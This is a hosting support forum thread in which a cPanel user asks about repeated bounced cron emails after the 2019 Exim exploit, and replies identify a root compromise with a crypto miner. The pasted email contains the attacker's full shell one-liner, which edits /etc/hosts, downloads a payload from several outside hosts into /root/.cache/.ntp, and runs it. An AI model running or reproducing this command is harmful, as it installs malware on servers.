Mail delivery failed: returning message to sender

slideloft

• June 22, 2019 18:49

Hi . I upgraded my cpanel after the Exim exploit and ever since then i have been getting emails in queue that contains the following . --1561246082-eximdsn-632408078 Content-type: text/plain; charset=us-ascii This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: root@server.example.com root cannot accept local mail deliveries --1561246082-eximdsn-632408078 Content-type: message/delivery-status Reporting-MTA: dns; server.example.com Action: failed Final-Recipient: rfc822;root@server.example.com Status: 5.0.0 --1561246082-eximdsn-632408078 Content-type: text/rfc822-headers Return-path: Received: from root by mega.example.com with local (Exim 4.92) (envelope-from ) id 1hepQP-00074l-Uw for root@server.example.com; Sat, 22 Jun 2019 23:28:02 +0000 From: root@server.example.com (Cron Daemon) To: root@server.example.com Subject: Cron tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp Content-Type: text/plain; charset=ANSI_X3.4-1968 Auto-Submitted: auto-generated X-Cron-Env: X-Cron-Env: X-Cron-Env: X-Cron-Env: X-Cron-Env: Message-Id: Date: Sat, 22 Jun 2019 23:28:01 +0000 X-Exim-DSN-Information: Due to administrative limits only headers are returned --1561246082-eximdsn-632408078--
How can i fix this . i am getting mails every 2 minute.

• 

  GOT

  • June 23, 2019 00:17

  It looks to me like your hostname is not a fqdn . Go to whm and reset your hostname. This is a common problem with openvz vms which I'd bet is what you have. Only your host can fix the issue with the changing hostname every time you boot..

  0
• 

  Infopro

  • June 23, 2019 00:19

  Checking google for just a snip of your post: /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/
  ...and I found this link. Worth looking at this closer I think. [QUOTE] In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.
  I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link. If you're unsure what to do here, you might want to look into hiring someone that can help you with this:

  0
• 

  cPanelLauren

  • June 24, 2019 19:11

  1. the error here: root@server.example.com root cannot accept local mail deliveries Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences. 2. And by far the most important: That cron output is associated with the exim compromise. If you'd like for us to investigate to identify if your server is root compromised we would be happy to. I also want to point out that there is no safe way to clean a root level compromise, if it is found that you have been affected (which I am almost certain you have) you will need to migrate. We also offer migrations for this. If you'd like cPanel's support to assist you can open a ticket using the link in my signature. Once open please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved. Thanks!

  0

Please sign in to leave a comment.